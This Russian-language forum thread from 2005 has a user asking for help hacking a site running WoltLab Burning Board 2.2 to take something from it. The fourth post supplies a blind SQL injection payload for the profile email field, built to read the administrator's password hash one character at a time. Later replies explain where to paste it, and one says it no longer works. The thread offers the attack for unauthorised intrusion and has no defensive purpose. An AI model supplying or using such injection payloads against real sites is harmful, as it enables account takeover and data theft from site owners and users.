Форумы WoltLab Burning Board 2.2 - что за крепость, и есть ли уязвимости?

Discussion in 'Уязвимости CMS/форумов' started by Anti, 23 May 2005.

  1. Anti

    Anti New Member

    Joined:
    13 Apr 2005
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Люди, надо помочь взломать форум сделанный на движке (или как там правилльно) WoltLab Burning Board 2.2
    кто с этим сталкивался и что надо сделать, читал статьи с секьюрити лаб, но так и ничего не понял :cool: вот такой я пень :) ну кто, что знает что с этим делать? как его сломать?
     
  2. coyl

    coyl Elder - Старейшина

    Joined:
    14 Jan 2005
    Messages:
    125
    Likes Received:
    3
    Reputations:
    2
    дай линк
     
  3. Anti

    Anti New Member

    Joined:
    13 Apr 2005
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    а можешь просто сказать несколько сплоитов? мне просто форум не надо ломать... мне только кое-какую мелоч там надо взять :)
     
  4. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
    PHP:
    sre464hfrgt6@4g546ufgfrh5.org' OR (userid=1 AND MID(password,1,1)='a')/*
    это в емаил
     
  5. Anti

    Anti New Member

    Joined:
    13 Apr 2005
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Млин, тупой я!!! а куда вставлять этот пхп код? типо регистрируешься и вставляешь в свой е-мейл адрес? или я вообще тупой как дрова?
     
  6. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    да тупой ты ))) сказано же в емайл...поле эмэйл где есть??в профиле...значит туда и надо вставлять, да и это не пхп код это скуль инж.
     
  7. qBiN

    qBiN Вот такой вот я :(

    Joined:
    20 Jan 2005
    Messages:
    834
    Likes Received:
    73
    Reputations:
    33
    ЭЭ...Ну...Вопще то хэто даже не пхп....Приглядись...MySQL inj
     
  8. Phoenix@2006

    Phoenix@2006 New Member

    Joined:
    19 Mar 2006
    Messages:
    9
    Likes Received:
    0
    Reputations:
    -2
    Эта уязвимость уже не работает.
    Уесть что-то поновее?
     
  9. qBiN

    qBiN Вот такой вот я :(

    Joined:
    20 Jan 2005
    Messages:
    834
    Likes Received:
    73
    Reputations:
    33
    Тут не багтрек.Ищи выкладывай.Обсуждай наработки.Остальное в топку..